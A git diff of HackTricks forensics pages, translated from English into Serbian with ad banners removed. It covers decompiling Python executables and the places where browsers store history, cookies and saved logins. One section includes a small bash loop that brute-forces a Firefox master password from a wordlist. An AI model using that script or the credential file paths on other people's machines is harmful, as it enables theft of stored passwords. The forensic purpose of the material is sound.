 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
index ec397e99a..63c3c697b 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
@@ -1,77 +1,61 @@
-# Decompile compiled python binaries (exe, elf) - Retreive from .pyc
+# Decompilacija kompajliranih python binarnih fajlova (exe, elf) - Preuzimanje iz .pyc
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
-
-## From Compiled Binary to .pyc
-
-From an **ELF** compiled binary you can **get the .pyc** with:
+## Od kompajliranog binarnog fajla do .pyc
 
+Iz **ELF** kompajliranog binarnog fajla možete **dobiti .pyc** sa:
 ```bash
 pyi-archive_viewer 
 # The list of python modules will be given here:
 [(0, 230, 311, 1, 'm', 'struct'),
- (230, 1061, 1792, 1, 'm', 'pyimod01_os_path'),
- (1291, 4071, 8907, 1, 'm', 'pyimod02_archive'),
- (5362, 5609, 13152, 1, 'm', 'pyimod03_importers'),
- (10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'),
- (12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'),
- (13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'),
- (13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'),
- (15090, 445, 672, 1, 's', 'pyi_rth_inspect'),
- (15535, 2514, 4421, 1, 's', 'binary_name'),
+(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'),
+(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'),
+(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'),
+(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'),
+(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'),
+(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'),
+(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'),
+(15090, 445, 672, 1, 's', 'pyi_rth_inspect'),
+(15535, 2514, 4421, 1, 's', 'binary_name'),
 ...
 
 ? X binary_name
 to filename? /tmp/binary.pyc
 ```
-
-In a **python exe binary** compiled you can **get the .pyc** by running:
-
+U **python exe binarnom** kompajliranom možete **dobiti .pyc** pokretanjem:
 ```bash
 python pyinstxtractor.py executable.exe
 ```
+## Od .pyc do python koda
 
-## From .pyc to python code
-
-For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**:
-
+Za **.pyc** podatke ("kompilirani" python) trebali biste početi da pokušavate da **izvučete** **originalni** **python** **kod**:
 ```bash
 uncompyle6 binary.pyc  > decompiled.py
 ```
+**Uverite se** da binarni fajl ima **ekstenziju** "**.pyc**" (ako ne, uncompyle6 neće raditi)
 
-**Be sure** that the binary has the **extension** "**.pyc**" (if not, uncompyle6 is not going to work)
-
-While executing **uncompyle6** you might find the **following errors**:
-
-### Error: Unknown magic number 227
+Tokom izvršavanja **uncompyle6** mogli biste naići na **sledeće greške**:
 
+### Greška: Nepoznat magični broj 227
 ```bash
 /kali/.local/bin/uncompyle6 /tmp/binary.pyc
 Unknown magic number 227 in /tmp/binary.pyc
 ```
+Da biste to popravili, potrebno je da **dodate ispravan magični broj** na početku generisanog fajla.
 
-To fix this you need to **add the correct magic number** at the beginning of the generated file.
-
-**Magic numbers vary with the python version**, to get the magic number of **python 3.8** you will need to **open a python 3.8** terminal and execute:
-
+**Magični brojevi se razlikuju u zavisnosti od verzije pythona**, da biste dobili magični broj za **python 3.8**, potrebno je da **otvorite python 3.8** terminal i izvršite:
 ```
 >> import imp
 >> imp.get_magic().hex()
 '550d0d0a'
 ```
+**Magični broj** u ovom slučaju za python3.8 je **`0x550d0d0a`**, zatim, da biste ispravili ovu grešku, moraćete da **dodate** na **početak** **.pyc datoteke** sledeće bajtove: `0x0d550a0d000000000000000000000000`
 
-The **magic number** in this case for python3.8 is **`0x550d0d0a`**, then, to fix this error you will need to **add** at the **beginning** of the **.pyc file** the following bytes: `0x0d550a0d000000000000000000000000`
-
-**Once** you have **added** that magic header, the **error should be fixed.**
-
-This is how a correctly added **.pyc python3.8 magic header** will look like:
+**Jednom** kada ste **dodali** taj magični zaglavlje, **greška bi trebala biti ispravljena.**
 
+Ovako će izgledati ispravno dodato **.pyc python3.8 magično zaglavlje**:
 ```bash
 hexdump 'binary.pyc' | head
 0000000 0d55 0a0d 0000 0000 0000 0000 0000 0000
@@ -79,25 +63,23 @@ hexdump 'binary.pyc' | head
 0000020 0700 0000 4000 0000 7300 0132 0000 0064
 0000030 0164 006c 005a 0064 0164 016c 015a 0064
 ```
+### Greška: Decompiling generic errors
 
-### Error: Decompiling generic errors
+**Druge greške** kao što su: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` mogu se pojaviti.
 
-**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` may appear.
+To verovatno znači da **niste ispravno dodali** magični broj ili da niste **koristili** **ispravan magični broj**, pa se **pobrinite da koristite ispravan** (ili pokušajte novi).
 
-This probably means that you **haven't added correctly** the magic number or that you haven't **used** the **correct magic number**, so make **sure you use the correct one** (or try a new one).
+Proverite dokumentaciju o prethodnim greškama.
 
-Check the previous error documentation.
+## Automatski alat
 
-## Automatic Tool
+[**python-exe-unpacker alat**](https://github.com/countercept/python-exe-unpacker) služi kao kombinacija nekoliko alata dostupnih u zajednici, dizajniranih da pomognu istraživačima u raspakivanju i decompiling izvršnih datoteka napisanih u Pythonu, posebno onih kreiranih sa py2exe i pyinstaller. Uključuje YARA pravila za identifikaciju da li je izvršna datoteka zasnovana na Pythonu i potvrđuje alat za kreiranje.
 
-The [**python-exe-unpacker tool**](https://github.com/countercept/python-exe-unpacker) serves as a combination of several community-available tools designed to assist researchers in unpacking and decompiling executables written in Python, specifically those created with py2exe and pyinstaller. It includes YARA rules to identify if an executable is Python-based and confirms the creation tool.
+### ImportError: Ime datoteke: 'unpacked/malware_3.exe/**pycache**/archive.cpython-35.pyc' ne postoji
 
-### ImportError: File name: 'unpacked/malware_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist
-
-A common issue encountered involves an incomplete Python bytecode file resulting from the **unpacking process with unpy2exe or pyinstxtractor**, which then **fails to be recognized by uncompyle6 due to a missing Python bytecode version number**. To address this, a prepend option has been added, which appends the necessary Python bytecode version number, facilitating the decompiling process.
-
-Example of the issue:
+Uobičajen problem koji se javlja uključuje nepotpunu Python bytecode datoteku koja je rezultat **procesa raspakivanja sa unpy2exe ili pyinstxtractor**, koja zatim **ne može biti prepoznata od strane uncompyle6 zbog nedostatka broja verzije Python bytecode-a**. Da bi se to rešilo, dodata je opcija za preklapanje, koja dodaje neophodan broj verzije Python bytecode-a, olakšavajući proces decompiling-a.
 
+Primer problema:
 ```python
 # Error when attempting to decompile without the prepend option
 test@test: uncompyle6 unpacked/malware_3.exe/archive.py
@@ -115,11 +97,9 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
 # Successfully decompiled file
 [+] Successfully decompiled.
 ```
+## Analiza python asemblera
 
-## Analyzing python assembly
-
-If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **disassemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2:
-
+Ako niste mogli da izvučete "originalni" python kod prateći prethodne korake, možete pokušati da **izvučete** **asembler** (ali **nije baš opisno**, pa **pokušajte** ponovo da izvučete originalni kod). U [ovde](https://bits.theorem.co/protecting-a-python-codebase/) sam pronašao vrlo jednostavan kod za **dezintegraciju** _.pyc_ binarnog fajla (srećno sa razumevanjem toka koda). Ako je _.pyc_ iz python2, koristite python2:
 ```bash
 >>> import dis
 >>> import marshal
@@ -145,34 +125,32 @@ True
 >>>
 >>> # Disassemble the code object
 >>> dis.disassemble(code)
-  1           0 LOAD_CONST               0 ()
-              3 MAKE_FUNCTION            0
-              6 STORE_NAME               0 (hello_world)
-              9 LOAD_CONST               1 (None)
-             12 RETURN_VALUE
+1           0 LOAD_CONST               0 ()
+3 MAKE_FUNCTION            0
+6 STORE_NAME               0 (hello_world)
+9 LOAD_CONST               1 (None)
+12 RETURN_VALUE
 >>>
 >>> # Also disassemble that const being loaded (our function)
 >>> dis.disassemble(code.co_consts[0])
-  2           0 LOAD_CONST               1 ('Hello  {0}')
-              3 LOAD_ATTR                0 (format)
-              6 LOAD_FAST                0 (name)
-              9 CALL_FUNCTION            1
-             12 PRINT_ITEM
-             13 PRINT_NEWLINE
-             14 LOAD_CONST               0 (None)
-             17 RETURN_VALUE
+2           0 LOAD_CONST               1 ('Hello  {0}')
+3 LOAD_ATTR                0 (format)
+6 LOAD_FAST                0 (name)
+9 CALL_FUNCTION            1
+12 PRINT_ITEM
+13 PRINT_NEWLINE
+14 LOAD_CONST               0 (None)
+17 RETURN_VALUE
 ```
+## Python u izvršni fajl
 
-## Python to Executable
+Da počnemo, pokažaćemo vam kako se payloadi mogu kompajlirati u py2exe i PyInstaller.
 
-To start, we’re going to show you how payloads can be compiled in py2exe and PyInstaller.
-
-### To create a payload using py2exe:
-
-1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org)
-2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option “bundle_files” with the value of 1 will bundle everything including the Python interpreter into one exe.
-3. Once the script is ready, we will issue the command “python setup.py py2exe”. This will create the executable, just like in Figure 2.
+### Da kreirate payload koristeći py2exe:
 
+1. Instalirajte py2exe paket sa [http://www.py2exe.org/](http://www.py2exe.org)
+2. Za payload (u ovom slučaju, nazvaćemo ga hello.py), koristite skriptu kao što je prikazano na Slici 1. Opcija “bundle_files” sa vrednošću 1 će sve spojiti, uključujući Python interpreter, u jedan exe.
+3. Kada je skripta spremna, izdaćemo komandu “python setup.py py2exe”. Ovo će kreirati izvršni fajl, baš kao na Slici 2.
 ```python
 from distutils.core import setup
 import py2exe, sys, os
@@ -180,10 +158,10 @@ import py2exe, sys, os
 sys.argv.append('py2exe')
 
 setup(
-    options = {'py2exe': {'bundle_files': 1}},
-    #windows = [{'script': "hello.py"}],
-  console = [{'script': "hello.py"}],
-    zipfile = None,
+options = {'py2exe': {'bundle_files': 1}},
+#windows = [{'script': "hello.py"}],
+console = [{'script': "hello.py"}],
+zipfile = None,
 )
 ```
 
@@ -200,12 +178,10 @@ running py2exe
 copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe
 Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
 ```
+### Da biste kreirali payload koristeći PyInstaller:
 
-### To create a payload using PyInstaller:
-
-1. Install PyInstaller using pip (pip install pyinstaller).
-2. After that, we will issue the command “pyinstaller –onefile hello.py” (a reminder that ‘hello.py’ is our payload). This will bundle everything into one executable.
-
+1. Instalirajte PyInstaller koristeći pip (pip install pyinstaller).
+2. Nakon toga, izdaćemo komandu “pyinstaller –onefile hello.py” (podsećanje da je ‘hello.py’ naš payload). Ovo će sve spojiti u jedan izvršni fajl.
 ```
 C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
 108 INFO: PyInstaller: 3.3.1
@@ -218,15 +194,9 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
 5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe
 6325 INFO: Building EXE from out00-EXE.toc completed successfully.
 ```
-
-## References
+## Reference
 
 - [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
 
-

-
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md
index 76fa3ef23..df3900540 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md
@@ -1,6 +1,6 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-Here you can find interesting tricks for specific file-types and/or software:
+Ovde možete pronaći zanimljive trikove za specifične tipove fajlova i/ili softver:
 
 {{#ref}}
 .pyc.md
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index 104a7530f..7db647e6b 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -2,138 +2,128 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %}
-
 ## Browsers Artifacts 
 
-Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types.
+Browser artifacts uključuju različite vrste podataka koje čuvaju web pregledači, kao što su istorija navigacije, obeleživači i podaci iz keša. Ovi artefakti se čuvaju u specifičnim fasciklama unutar operativnog sistema, razlikujući se po lokaciji i imenu među pregledačima, ali generalno čuvaju slične tipove podataka.
 
-Here's a summary of the most common browser artifacts:
+Evo sažetak najčešćih browser artefakata:
 
-- **Navigation History**: Tracks user visits to websites, useful for identifying visits to malicious sites.
-- **Autocomplete Data**: Suggestions based on frequent searches, offering insights when combined with navigation history.
-- **Bookmarks**: Sites saved by the user for quick access.
-- **Extensions and Add-ons**: Browser extensions or add-ons installed by the user.
-- **Cache**: Stores web content (e.g., images, JavaScript files) to improve website loading times, valuable for forensic analysis.
-- **Logins**: Stored login credentials.
-- **Favicons**: Icons associated with websites, appearing in tabs and bookmarks, useful for additional information on user visits.
-- **Browser Sessions**: Data related to open browser sessions.
-- **Downloads**: Records of files downloaded through the browser.
-- **Form Data**: Information entered in web forms, saved for future autofill suggestions.
-- **Thumbnails**: Preview images of websites.
-- **Custom Dictionary.txt**: Words added by the user to the browser's dictionary.
+- **Istorija navigacije**: Prati posete korisnika veb sajtovima, korisno za identifikaciju poseta zlonamernim sajtovima.
+- **Podaci za automatsko popunjavanje**: Predlozi zasnovani na čestim pretragama, nude uvid kada se kombinuju sa istorijom navigacije.
+- **Obeleživači**: Sajtovi koje je korisnik sačuvao za brzi pristup.
+- **Ekstenzije i dodaci**: Ekstenzije pregledača ili dodaci koje je instalirao korisnik.
+- **Keš**: Čuva veb sadržaj (npr. slike, JavaScript datoteke) kako bi poboljšao vreme učitavanja veb sajtova, vredno za forenzičku analizu.
+- **Prijave**: Sačuvane prijavne informacije.
+- **Favikoni**: Ikone povezane sa veb sajtovima, pojavljuju se u karticama i obeleživačima, korisne za dodatne informacije o posetama korisnika.
+- **Sesije pregledača**: Podaci vezani za otvorene sesije pregledača.
+- **Preuzimanja**: Zapisnici datoteka preuzetih putem pregledača.
+- **Podaci iz obrazaca**: Informacije unesene u veb obrasce, sačuvane za buduće predloge automatskog popunjavanja.
+- **Sličice**: Pregledne slike veb sajtova.
+- **Custom Dictionary.txt**: Reči koje je korisnik dodao rečniku pregledača.
 
 ## Firefox
 
-Firefox organizes user data within profiles, stored in specific locations based on the operating system:
+Firefox organizuje korisničke podatke unutar profila, koji se čuvaju na specifičnim lokacijama u zavisnosti od operativnog sistema:
 
 - **Linux**: `~/.mozilla/firefox/`
 - **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/`
 - **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\`
 
-A `profiles.ini` file within these directories lists the user profiles. Each profile's data is stored in a folder named in the `Path` variable within `profiles.ini`, located in the same directory as `profiles.ini` itself. If a profile's folder is missing, it may have been deleted.
+Datoteka `profiles.ini` unutar ovih direktorijuma sadrži listu korisničkih profila. Podaci svakog profila se čuvaju u fascikli nazvanoj u `Path` varijabli unutar `profiles.ini`, koja se nalazi u istom direktorijumu kao i `profiles.ini`. Ako nedostaje fascikla profila, možda je obrisana.
 
-Within each profile folder, you can find several important files:
+Unutar svake fascikle profila možete pronaći nekoliko važnih datoteka:
 
-- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data.
-  - Use specific SQL queries to extract history and downloads information.
-- **bookmarkbackups**: Contains backups of bookmarks.
-- **formhistory.sqlite**: Stores web form data.
-- **handlers.json**: Manages protocol handlers.
-- **persdict.dat**: Custom dictionary words.
-- **addons.json** and **extensions.sqlite**: Information on installed add-ons and extensions.
-- **cookies.sqlite**: Cookie storage, with [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) available for inspection on Windows.
-- **cache2/entries** or **startupCache**: Cache data, accessible through tools like [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
-- **favicons.sqlite**: Stores favicons.
-- **prefs.js**: User settings and preferences.
-- **downloads.sqlite**: Older downloads database, now integrated into places.sqlite.
-- **thumbnails**: Website thumbnails.
-- **logins.json**: Encrypted login information.
-- **key4.db** or **key3.db**: Stores encryption keys for securing sensitive information.
+- **places.sqlite**: Čuva istoriju, obeleživače i preuzimanja. Alati poput [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) na Windows-u mogu pristupiti podacima o istoriji.
+- Koristite specifične SQL upite za ekstrakciju informacija o istoriji i preuzimanjima.
+- **bookmarkbackups**: Sadrži rezervne kopije obeleživača.
+- **formhistory.sqlite**: Čuva podatke iz veb obrazaca.
+- **handlers.json**: Upravljanje protokolima.
+- **persdict.dat**: Reči iz prilagođenog rečnika.
+- **addons.json** i **extensions.sqlite**: Informacije o instaliranim dodacima i ekstenzijama.
+- **cookies.sqlite**: Skladištenje kolačića, uz [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) dostupan za inspekciju na Windows-u.
+- **cache2/entries** ili **startupCache**: Podaci iz keša, dostupni putem alata kao što je [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
+- **favicons.sqlite**: Čuva favikone.
+- **prefs.js**: Korisničke postavke i preferencije.
+- **downloads.sqlite**: Starija baza podataka preuzimanja, sada integrisana u places.sqlite.
+- **thumbnails**: Sličice veb sajtova.
+- **logins.json**: Enkriptovane prijavne informacije.
+- **key4.db** ili **key3.db**: Čuva ključeve za enkripciju radi zaštite osetljivih informacija.
 
-Additionally, checking the browser’s anti-phishing settings can be done by searching for `browser.safebrowsing` entries in `prefs.js`, indicating whether safe browsing features are enabled or disabled.
-
-To try to decrypt the master password, you can use [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\
-With the following script and call you can specify a password file to brute force:
+Pored toga, proveru podešavanja pregledača za zaštitu od phishing-a možete izvršiti pretraživanjem `browser.safebrowsing` unosa u `prefs.js`, što ukazuje na to da li su funkcije sigurne navigacije omogućene ili onemogućene.
 
+Da biste pokušali da dekriptujete glavnu lozinku, možete koristiti [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\
+Sa sledećim skriptom i pozivom možete odrediti datoteku lozinki za brute force:
 ```bash:brute.sh
 #!/bin/bash
 
 #./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
 passfile=$1
 while read pass; do
-  echo "Trying $pass"
-  echo "$pass" | python firefox_decrypt.py
+echo "Trying $pass"
+echo "$pass" | python firefox_decrypt.py
 done < $passfile
 ```
-
 ![](<../../../images/image (692).png>)
 
 ## Google Chrome
 
-Google Chrome stores user profiles in specific locations based on the operating system:
+Google Chrome čuva korisničke profile na specifičnim lokacijama u zavisnosti od operativnog sistema:
 
 - **Linux**: `~/.config/google-chrome/`
 - **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\`
 - **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/`
 
-Within these directories, most user data can be found in the **Default/** or **ChromeDefaultData/** folders. The following files hold significant data:
+Unutar ovih direktorijuma, većina korisničkih podataka može se naći u **Default/** ili **ChromeDefaultData/** folderima. Sledeće datoteke sadrže značajne podatke:
 
-- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads.
-- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available.
-- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
-- **Bookmarks**: User bookmarks.
-- **Web Data**: Contains form history.
-- **Favicons**: Stores website favicons.
-- **Login Data**: Includes login credentials like usernames and passwords.
-- **Current Session**/**Current Tabs**: Data about the current browsing session and open tabs.
-- **Last Session**/**Last Tabs**: Information about the sites active during the last session before Chrome was closed.
-- **Extensions**: Directories for browser extensions and addons.
-- **Thumbnails**: Stores website thumbnails.
-- **Preferences**: A file rich in information, including settings for plugins, extensions, pop-ups, notifications, and more.
-- **Browser’s built-in anti-phishing**: To check if anti-phishing and malware protection are enabled, run `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Look for `{"enabled: true,"}` in the output.
+- **History**: Sadrži URL-ove, preuzimanja i ključne reči za pretragu. Na Windows-u, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) može se koristiti za čitanje istorije. Kolona "Transition Type" ima različita značenja, uključujući klikove korisnika na linkove, otkucane URL-ove, slanje obrazaca i ponovna učitavanja stranica.
+- **Cookies**: Čuva kolačiće. Za inspekciju, dostupna je [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html).
+- **Cache**: Drži keširane podatke. Za inspekciju, korisnici Windows-a mogu koristiti [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
+- **Bookmarks**: Korisničke oznake.
+- **Web Data**: Sadrži istoriju obrazaca.
+- **Favicons**: Čuva favicon-e sajtova.
+- **Login Data**: Uključuje podatke za prijavu kao što su korisnička imena i lozinke.
+- **Current Session**/**Current Tabs**: Podaci o trenutnoj sesiji pretraživanja i otvorenim karticama.
+- **Last Session**/**Last Tabs**: Informacije o sajtovima aktivnim tokom poslednje sesije pre nego što je Chrome zatvoren.
+- **Extensions**: Direktorijumi za ekstenzije i dodatke pretraživača.
+- **Thumbnails**: Čuva sličice sajtova.
+- **Preferences**: Datoteka bogata informacijama, uključujući podešavanja za dodatke, ekstenzije, iskačuće prozore, obaveštenja i još mnogo toga.
+- **Browser’s built-in anti-phishing**: Da biste proverili da li su zaštita od phishing-a i zaštita od malvera omogućene, pokrenite `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Potražite `{"enabled: true,"}` u izlazu.
 
 ## **SQLite DB Data Recovery**
 
-As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
+Kao što možete primetiti u prethodnim odsecima, i Chrome i Firefox koriste **SQLite** baze podataka za čuvanje podataka. Moguće je **oporaviti obrisane unose koristeći alat** [**sqlparse**](https://github.com/padfoot999/sqlparse) **ili** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
 
 ## **Internet Explorer 11**
 
-Internet Explorer 11 manages its data and metadata across various locations, aiding in separating stored information and its corresponding details for easy access and management.
+Internet Explorer 11 upravlja svojim podacima i metapodacima na različitim lokacijama, pomažući u razdvajanju sačuvanih informacija i njihovih odgovarajućih detalja za lak pristup i upravljanje.
 
 ### Metadata Storage
 
-Metadata for Internet Explorer is stored in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (with VX being V01, V16, or V24). Accompanying this, the `V01.log` file might show modification time discrepancies with `WebcacheVX.data`, indicating a need for repair using `esentutl /r V01 /d`. This metadata, housed in an ESE database, can be recovered and inspected using tools like photorec and [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), respectively. Within the **Containers** table, one can discern the specific tables or containers where each data segment is stored, including cache details for other Microsoft tools such as Skype.
+Metapodaci za Internet Explorer čuvaju se u `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (gde je VX V01, V16 ili V24). Pored toga, datoteka `V01.log` može pokazati razlike u vremenu modifikacije sa `WebcacheVX.data`, što ukazuje na potrebu za popravkom koristeći `esentutl /r V01 /d`. Ovi metapodaci, smešteni u ESE bazi podataka, mogu se oporaviti i pregledati koristeći alate kao što su photorec i [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html). Unutar tabele **Containers**, može se razaznati specifične tabele ili kontejneri gde je svaki segment podataka smešten, uključujući detalje o kešu za druge Microsoft alate kao što je Skype.
 
 ### Cache Inspection
 
-The [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) tool allows for cache inspection, requiring the cache data extraction folder location. Metadata for cache includes filename, directory, access count, URL origin, and timestamps indicating cache creation, access, modification, and expiry times.
+Alat [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) omogućava inspekciju keša, zahtevajući lokaciju foldera za ekstrakciju podataka iz keša. Metapodaci za keš uključuju ime datoteke, direktorijum, broj pristupa, URL izvor i vremenske oznake koje označavaju vreme kreiranja, pristupa, modifikacije i isteka keša.
 
 ### Cookies Management
 
-Cookies can be explored using [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), with metadata encompassing names, URLs, access counts, and various time-related details. Persistent cookies are stored in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, with session cookies residing in memory.
+Kolačići se mogu istraživati koristeći [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), sa metapodacima koji obuhvataju imena, URL-ove, brojeve pristupa i razne vremenske detalje. Trajni kolačići se čuvaju u `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, dok se sesijski kolačići nalaze u memoriji.
 
 ### Download Details
 
-Downloads metadata is accessible via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), with specific containers holding data like URL, file type, and download location. Physical files can be found under `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
+Metapodaci o preuzimanjima su dostupni putem [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), sa specifičnim kontejnerima koji sadrže podatke kao što su URL, tip datoteke i lokacija preuzimanja. Fizičke datoteke se mogu naći pod `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
 
 ### Browsing History
 
-To review browsing history, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used, requiring the location of extracted history files and configuration for Internet Explorer. Metadata here includes modification and access times, along with access counts. History files are located in `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
+Za pregled istorije pretraživanja, može se koristiti [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html), zahtevajući lokaciju ekstraktovanih datoteka istorije i konfiguraciju za Internet Explorer. Metapodaci ovde uključuju vremena modifikacije i pristupa, zajedno sa brojevima pristupa. Datoteke istorije se nalaze u `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
 
 ### Typed URLs
 
-Typed URLs and their usage timings are stored within the registry under `NTUSER.DAT` at `Software\Microsoft\InternetExplorer\TypedURLs` and `Software\Microsoft\InternetExplorer\TypedURLsTime`, tracking the last 50 URLs entered by the user and their last input times.
+Otucani URL-ovi i njihova vremena korišćenja čuvaju se unutar registra pod `NTUSER.DAT` na `Software\Microsoft\InternetExplorer\TypedURLs` i `Software\Microsoft\InternetExplorer\TypedURLsTime`, prateći poslednjih 50 URL-ova koje je korisnik uneo i njihova poslednja vremena unosa.
 
 ## Microsoft Edge
 
-Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The paths for various data types are:
+Microsoft Edge čuva korisničke podatke u `%userprofile%\Appdata\Local\Packages`. Putanje za različite tipove podataka su:
 
 - **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
 - **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
@@ -143,24 +133,24 @@ Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The p
 
 ## Safari
 
-Safari data is stored at `/Users/$User/Library/Safari`. Key files include:
+Safari podaci se čuvaju na `/Users/$User/Library/Safari`. Ključne datoteke uključuju:
